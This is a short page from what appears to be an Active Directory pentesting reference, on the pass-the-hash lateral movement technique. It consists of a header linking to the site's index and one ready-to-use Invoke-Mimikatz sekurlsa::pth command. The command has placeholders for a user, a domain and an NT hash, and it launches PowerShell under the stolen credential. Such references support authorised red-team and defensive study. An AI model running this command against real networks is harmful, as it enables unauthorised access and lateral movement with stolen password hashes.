> For the complete documentation index, see [llms.txt](https://activedirectory.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://activedirectory.mrw0l05zyn.cl/movimiento-lateral/pass-the-hash-pth.md).

# Pass the Hash (PtH)

## Invoke-Mimikatz

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<ACME.LOCAL> /ntlm:<NT-hash> /run:powershell.exe"'
```
